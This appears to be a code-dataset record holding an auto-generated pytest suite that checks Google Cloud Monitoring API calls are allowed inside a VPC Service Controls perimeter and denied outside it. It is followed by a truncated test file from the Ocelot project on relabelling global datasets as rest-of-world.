|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 18
|
2020-09-19T17:52:47.000Z
|
2022-03-25T12:09:22.000Z
|
tests/system/test_vpcsc_v3.py
|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 110
|
2020-02-05T15:26:47.000Z
|
2022-03-28T23:02:02.000Z
|
tests/system/test_vpcsc_v3.py
|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 26
|
2020-02-08T00:05:46.000Z
|
2022-03-27T19:32:26.000Z
|
# -*- coding: utf-8 -*-
#
# flake8: noqa
#
# DO NOT MODIFY! THIS FILE IS AUTO-GENERATED.
# This file is auto-generated on 11 Oct 19 21:43 UTC.
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from google.api_core import exceptions
from google.cloud import monitoring_v3
from test_utils.vpcsc_config import vpcsc_config
_VPCSC_PROHIBITED_MESSAGE = "Request is prohibited by organization's policy"
@pytest.fixture(scope="module")
def aps_client():
return monitoring_v3.AlertPolicyServiceClient()
@pytest.fixture(scope="module")
def name_inside(aps_client):
return f"projects/{vpcsc_config.project_inside}"
@pytest.fixture(scope="module")
def name_outside(aps_client):
return f"projects/{vpcsc_config.project_outside}"
@pytest.fixture(scope="module")
def alert_policy_path_inside(aps_client):
alert_policy_id = "mock_alert_policy"
return aps_client.alert_policy_path(vpcsc_config.project_inside, alert_policy_id)
@pytest.fixture(scope="module")
def alert_policy_path_outside(aps_client):
alert_policy_id = "mock_alert_policy"
return aps_client.alert_policy_path(vpcsc_config.project_outside, alert_policy_id)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDAlertPolicies(object):
@staticmethod
def test_create_alert_policy_inside(aps_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
aps_client.create_alert_policy(
request={"name": name_inside, "alert_policy": {}}
)
@staticmethod
def test_create_alert_policy_outside(aps_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.create_alert_policy(
request={"name": name_outside, "alert_policy": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_alert_policies_inside(aps_client, name_inside):
list(aps_client.list_alert_policies(request={"name": name_inside}))
@staticmethod
def test_list_alert_policies_outside(aps_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(aps_client.list_alert_policies(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
aps_client.get_alert_policy(request={"name": alert_policy_path_inside})
@staticmethod
def test_get_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.get_alert_policy(request={"name": alert_policy_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
aps_client.update_alert_policy(
request={"alert_policy": {"name": alert_policy_path_inside}}
)
@staticmethod
def test_update_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.update_alert_policy(
request={"alert_policy": {"name": alert_policy_path_outside}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
aps_client.delete_alert_policy(request={"name": alert_policy_path_inside})
@staticmethod
def test_delete_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.delete_alert_policy(request={"name": alert_policy_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def gs_client():
return monitoring_v3.GroupServiceClient()
@pytest.fixture(scope="module")
def group_path_inside(gs_client):
group_id = "mock_group"
return gs_client.group_path(vpcsc_config.project_inside, group_id)
@pytest.fixture(scope="module")
def group_path_outside(gs_client):
group_id = "mock_group"
return gs_client.group_path(vpcsc_config.project_outside, group_id)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDGroups(object):
@staticmethod
def test_create_group_inside(gs_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.create_group(request={"name": name_inside, "group": {}})
@staticmethod
def test_create_group_outside(gs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.create_group(request={"name": name_outside, "group": {}})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_groups_inside(gs_client, name_inside):
list(gs_client.list_groups(request={"name": name_inside}))
@staticmethod
def test_list_groups_outside(gs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(gs_client.list_groups(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.get_group(request={"name": group_path_inside})
@staticmethod
def test_get_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.get_group(request={"name": group_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_group_members_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
list(gs_client.list_group_members(request={"name": group_path_inside}))
@staticmethod
def test_list_group_members_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(gs_client.list_group_members(request={"name": group_path_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.update_group(request={"group": {"name": group_path_inside}})
@staticmethod
def test_update_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.update_group(request={"group": {"name": group_path_outside}})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.delete_group(request={"name": group_path_inside})
@staticmethod
def test_delete_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.delete_group(request={"name": group_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def ms_client():
return monitoring_v3.MetricServiceClient()
@pytest.fixture(scope="module")
def metric_descriptor_path_inside(ms_client):
metric_descriptor_id = "mock_metric_descriptor"
return ms_client.metric_descriptor_path(
vpcsc_config.project_inside, metric_descriptor_id
)
@pytest.fixture(scope="module")
def metric_descriptor_path_outside(ms_client):
metric_descriptor_id = "mock_metric_descriptor"
return ms_client.metric_descriptor_path(
vpcsc_config.project_outside, metric_descriptor_id
)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDMetricDescriptors(object):
@staticmethod
def test_create_metric_descriptor_inside(ms_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ms_client.create_metric_descriptor(
request={"name": name_inside, "metric_descriptor": {}}
)
@staticmethod
def test_create_metric_descriptor_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.create_metric_descriptor(
request={"name": name_outside, "metric_descriptor": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_metric_descriptors_inside(ms_client, name_inside):
list(ms_client.list_metric_descriptors(request={"name": name_inside}))
@staticmethod
def test_list_metric_descriptors_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(ms_client.list_metric_descriptors(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_metric_descriptor_inside(ms_client, metric_descriptor_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
ms_client.get_metric_descriptor(
request={"name": metric_descriptor_path_inside}
)
@staticmethod
def test_get_metric_descriptor_outside(ms_client, metric_descriptor_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.get_metric_descriptor(
request={"name": metric_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_metric_descriptor_inside(ms_client, metric_descriptor_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ms_client.delete_metric_descriptor(
request={"name": metric_descriptor_path_inside}
)
@staticmethod
def test_delete_metric_descriptor_outside(
ms_client, metric_descriptor_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.delete_metric_descriptor(
request={"name": metric_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDTimeSeries(object):
@staticmethod
def test_create_time_series_inside(ms_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ms_client.create_time_series(
request={"name": name_inside, "time_series": {}}
)
@staticmethod
def test_create_time_series_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.create_time_series(
request={"name": name_outside, "time_series": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_time_series_inside(ms_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
list(
ms_client.list_time_series(
request={
"name": name_inside,
"filter": "",
"interval": {},
"view": monitoring_v3.ListTimeSeriesRequest.TimeSeriesView.FULL,
}
)
)
@staticmethod
def test_list_time_series_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(
ms_client.list_time_series(
request={
"name": name_outside,
"filter": "",
"interval": {},
"view": monitoring_v3.ListTimeSeriesRequest.TimeSeriesView.FULL,
}
)
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def monitored_resource_descriptor_path_inside(ms_client):
monitored_resource_descriptor_id = "mock_monitored_resource_descriptor"
return ms_client.monitored_resource_descriptor_path(
vpcsc_config.project_inside, monitored_resource_descriptor_id
)
@pytest.fixture(scope="module")
def monitored_resource_descriptor_path_outside(ms_client):
monitored_resource_descriptor_id = "mock_monitored_resource_descriptor"
return ms_client.monitored_resource_descriptor_path(
vpcsc_config.project_outside, monitored_resource_descriptor_id
)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDMonitoredResourceDescriptor(object):
@staticmethod
def test_list_monitored_resource_descriptors_inside(ms_client, name_inside):
list(
ms_client.list_monitored_resource_descriptors(request={"name": name_inside})
)
@staticmethod
def test_list_monitored_resource_descriptors_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(
ms_client.list_monitored_resource_descriptors(
request={"name": name_outside}
)
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_monitored_resource_descriptor_inside(
ms_client, monitored_resource_descriptor_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ms_client.get_monitored_resource_descriptor(
request={"name": monitored_resource_descriptor_path_inside}
)
@staticmethod
def test_get_monitored_resource_descriptor_outside(
ms_client, monitored_resource_descriptor_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.get_monitored_resource_descriptor(
request={"name": monitored_resource_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def ncs_client():
return monitoring_v3.NotificationChannelServiceClient()
@pytest.fixture(scope="module")
def notification_channel_path_inside(ncs_client):
notification_channel_id = "mock_notification_channel"
return ncs_client.notification_channel_path(
vpcsc_config.project_inside, notification_channel_id
)
@pytest.fixture(scope="module")
def notification_channel_descriptor_path_inside(ncs_client):
notification_channel_descriptor_id = "mock_notification_channel_descriptor"
return ncs_client.notification_channel_descriptor_path(
vpcsc_config.project_inside, notification_channel_descriptor_id
)
@pytest.fixture(scope="module")
def notification_channel_path_outside(ncs_client):
notification_channel_id = "mock_notification_channel"
return ncs_client.notification_channel_path(
vpcsc_config.project_outside, notification_channel_id
)
@pytest.fixture(scope="module")
def notification_channel_descriptor_path_outside(ncs_client):
notification_channel_descriptor_id = "mock_notification_channel_descriptor"
return ncs_client.notification_channel_descriptor_path(
vpcsc_config.project_outside, notification_channel_descriptor_id
)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDNotificationChannels(object):
@staticmethod
def test_create_notification_channel_inside(ncs_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ncs_client.create_notification_channel(
request={"name": name_inside, "notification_channel": {}}
)
@staticmethod
def test_create_notification_channel_outside(ncs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.create_notification_channel(
request={"name": name_outside, "notification_channel": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_notification_channels_inside(ncs_client, name_inside):
list(ncs_client.list_notification_channels(request={"name": name_inside}))
@staticmethod
def test_list_notification_channels_outside(ncs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(ncs_client.list_notification_channels(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_notification_channel_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.get_notification_channel(
request={"name": notification_channel_path_inside}
)
@staticmethod
def test_get_notification_channel_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.get_notification_channel(
request={"name": notification_channel_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_notification_channel_verification_code_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.get_notification_channel_verification_code(
request={"name": notification_channel_path_inside}
)
@staticmethod
def test_get_notification_channel_verification_code_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.get_notification_channel_verification_code(
request={"name": notification_channel_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_send_notification_channel_verification_code_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.send_notification_channel_verification_code(
request={"name": notification_channel_path_inside}
)
@staticmethod
def test_send_notification_channel_verification_code_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.send_notification_channel_verification_code(
request={"name": notification_channel_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_verify_notification_channel_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.verify_notification_channel(
request={"name": notification_channel_path_inside, "code": ""}
)
@staticmethod
def test_verify_notification_channel_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.verify_notification_channel(
request={"name": notification_channel_path_outside, "code": ""}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_notification_channel_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ncs_client.update_notification_channel(
request={
"notification_channel": {"name": notification_channel_path_inside}
}
)
@staticmethod
def test_update_notification_channel_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.update_notification_channel(
request={
"notification_channel": {"name": notification_channel_path_outside}
}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_notification_channel_inside(
ncs_client, notification_channel_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.delete_notification_channel(
request={"name": notification_channel_path_inside}
)
@staticmethod
def test_delete_notification_channel_outside(
ncs_client, notification_channel_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.delete_notification_channel(
request={"name": notification_channel_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_notification_channel_descriptors_inside(ncs_client, name_inside):
list(
ncs_client.list_notification_channel_descriptors(
request={"name": name_inside}
)
)
@staticmethod
def test_list_notification_channel_descriptors_outside(ncs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(
ncs_client.list_notification_channel_descriptors(
request={"name": name_outside}
)
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_notification_channel_descriptor_inside(
ncs_client, notification_channel_descriptor_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ncs_client.get_notification_channel_descriptor(
request={"name": notification_channel_descriptor_path_inside}
)
@staticmethod
def test_get_notification_channel_descriptor_outside(
ncs_client, notification_channel_descriptor_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ncs_client.get_notification_channel_descriptor(
request={"name": notification_channel_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def ucc_client():
return monitoring_v3.UptimeCheckServiceClient()
@pytest.fixture(scope="module")
def uptime_check_config_path_inside(ucc_client):
uptime_check_config_id = "mock_notification_channel"
return ucc_client.uptime_check_config_path(
vpcsc_config.project_inside, uptime_check_config_id
)
@pytest.fixture(scope="module")
def uptime_check_config_path_outside(ucc_client):
uptime_check_config_id = "mock_notification_channel"
return ucc_client.uptime_check_config_path(
vpcsc_config.project_outside, uptime_check_config_id
)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDUptimeCheckConfigs(object):
@staticmethod
def test_create_uptime_check_config_inside(ucc_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ucc_client.create_uptime_check_config(
request={"parent": name_inside, "uptime_check_config": {}}
)
@staticmethod
def test_create_uptime_check_config_outside(ucc_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ucc_client.create_uptime_check_config(
request={"parent": name_outside, "uptime_check_config": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_uptime_check_configs_inside(ucc_client, name_inside):
list(ucc_client.list_uptime_check_configs(request={"parent": name_inside}))
@staticmethod
def test_list_uptime_check_configs_outside(ucc_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(ucc_client.list_uptime_check_configs(request={"parent": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_uptime_check_config_inside(
ucc_client, uptime_check_config_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ucc_client.get_uptime_check_config(
request={"name": uptime_check_config_path_inside}
)
@staticmethod
def test_get_uptime_check_config_outside(
ucc_client, uptime_check_config_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ucc_client.get_uptime_check_config(
request={"name": uptime_check_config_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_uptime_check_config_inside(
ucc_client, uptime_check_config_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ucc_client.update_uptime_check_config(
request={
"uptime_check_config": {"name": uptime_check_config_path_inside}
}
)
@staticmethod
def test_update_uptime_check_config_outside(
ucc_client, uptime_check_config_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ucc_client.update_uptime_check_config(
request={
"uptime_check_config": {"name": uptime_check_config_path_outside}
}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_uptime_check_config_inside(
ucc_client, uptime_check_config_path_inside
):
with pytest.raises(exceptions.NotFound): # no perms issue
ucc_client.delete_uptime_check_config(
request={"name": uptime_check_config_path_inside}
)
@staticmethod
def test_delete_uptime_check_config_outside(
ucc_client, uptime_check_config_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ucc_client.delete_uptime_check_config(
request={"name": uptime_check_config_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
| 36.819629
| 88
| 0.712773
| 3,095
| 27,762
| 5.979321
| 0.057512
| 0.092402
| 0.069815
| 0.085702
| 0.920134
| 0.901437
| 0.858478
| 0.823895
| 0.762455
| 0.711283
| 0
| 0.001193
| 0.21515
| 27,762
| 753
| 89
| 36.868526
| 0.848134
| 0.038974
| 0
| 0.577855
| 1
| 0
| 0.044719
| 0.013555
| 0
| 0
| 0
| 0
| 0.058824
| 1
| 0.153979
| false
| 0
| 0.008651
| 0.012111
| 0.211073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f413022b701412ef6519dbe2a76dc1bec15fa2
| 18,808
|
py
|
Python
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 21
|
2016-06-01T14:10:07.000Z
|
2022-02-28T01:56:31.000Z
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 152
|
2016-05-16T21:33:22.000Z
|
2019-06-24T12:57:14.000Z
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 12
|
2016-09-05T15:35:59.000Z
|
2021-07-03T19:28:47.000Z
|
# -*- coding: utf-8 -*-
from ocelot.errors import MultipleGlobalDatasets
from ocelot.transformations.locations import (
drop_zero_pv_row_datasets,
relabel_global_to_row,
)
from copy import deepcopy
import pytest
def test_relabel_global_to_row():
given = [{
'name': 'make something',
'location': 'GLO',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'production volume': {'amount': 0},
'amount': 1,
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}, {
'name': 'make something else',
'location': 'GLO',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume': {'amount': 0}
}]
}, {
'name': 'make something else',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
expected = [{
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}, {
'name': 'make something else',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}, {
'name': 'make something else',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
# Can't directly compare dictionaries if order has changed
hashify = lambda x: {(y['name'], y['location']) for y in x}
assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_dropped_products():
given = [{
'name': 'make something',
'location': 'GLO',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'production volume': {'amount': 0},
'amount': 1,
}, {
'name': 'another product',
'unit': '',
'type': 'byproduct',
'byproduct classification': 'allocatable product',
'production volume': {'amount': 0},
'amount': 1,
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
expected = [{
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}, {
'name': 'another product',
'unit': '',
'type': 'byproduct',
'byproduct classification': 'allocatable product',
'production volume': {'amount': 0},
'amount': 0,
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
# Can't directly compare dictionaries if order has changed
hashify = lambda x: {(y['name'], y['location']) for y in x}
assert hashify(relabel_global_to_row(given)) != hashify(expected)
def test_relabel_global_to_row_ignore_zero_dropped_products():
given = [{
'name': 'make something',
'location': 'GLO',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'production volume': {'amount': 0},
'amount': 1,
}, {
'name': 'another product',
'unit': '',
'type': 'byproduct',
'byproduct classification': 'allocatable product',
'production volume': {'amount': 0},
'amount': 0,
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
expected = [{
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}, {
'name': 'another product',
'unit': '',
'type': 'byproduct',
'byproduct classification': 'allocatable product',
'production volume': {'amount': 0},
'amount': 0,
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'unit': '',
'type': 'reference product',
'amount': 1,
'production volume': {'amount': 0}
}]
}]
# Can't directly compare dictionaries if order has changed
hashify = lambda x: {(y['name'], y['location']) for y in x}
assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_skip_market_groups():
given = [{
'name': 'shellfish',
'type': 'market group',
'location': 'GLO',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}, {
'name': 'shellfish',
'type': 'market group',
'location': 'CN',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}]
expected = deepcopy(given)
assert relabel_global_to_row(given) == expected
def test_relabel_global_to_row_only_single_global():
given = [{
'name': 'make something',
'type': 'market activity',
'location': 'GLO',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}]
expected = deepcopy(given)
assert relabel_global_to_row(given) == expected
def test_relabel_global_to_row_only_single_nonglobal():
given = [{
'name': 'make something',
'type': 'market activity',
'location': 'somewhere',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}]
expected = deepcopy(given)
assert relabel_global_to_row(given) == expected
def test_multiple_global_datasets():
given = [{
'name': 'make something',
'type': 'market activity',
'location': 'GLO',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}, {
'name': 'make something',
'type': 'market activity',
'location': 'GLO',
'exchanges': [{
'name': 'a product',
'amount': 1,
'type': 'reference product'
}]
}]
with pytest.raises(MultipleGlobalDatasets):
relabel_global_to_row(given)
def test_drop_zero_pv_row_datasets():
data = [
{
'type': 'party activity',
'location': 'RoW',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 0}
}]
},
{
'type': 'market activity',
'location': 'RoW',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 10}
}]
},
{
'type': 'market activity',
'location': 'Nowhere',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 0}
}]
},
{
'type': 'market activity',
'name': 'foo',
'location': 'RoW',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 0},
'name': 'bar'
}]
},
]
expected = [
{
'type': 'party activity',
'location': 'RoW',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 0}
}]
},
{
'type': 'market activity',
'location': 'RoW',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 10}
}]
},
{
'type': 'market activity',
'location': 'Nowhere',
'exchanges': [{
'type': 'reference product',
'production volume': {'amount': 0}
}]
},
]
assert drop_zero_pv_row_datasets(data) == expected
def test_relabel_global_to_row_subtract_pv():
given = [{
'name': 'make something',
'location': 'GLO',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':100
}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':10
}
}]
}, {
'name': 'make something else',
'location': 'GLO',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':100
}
}]
}, {
'name': 'make something else',
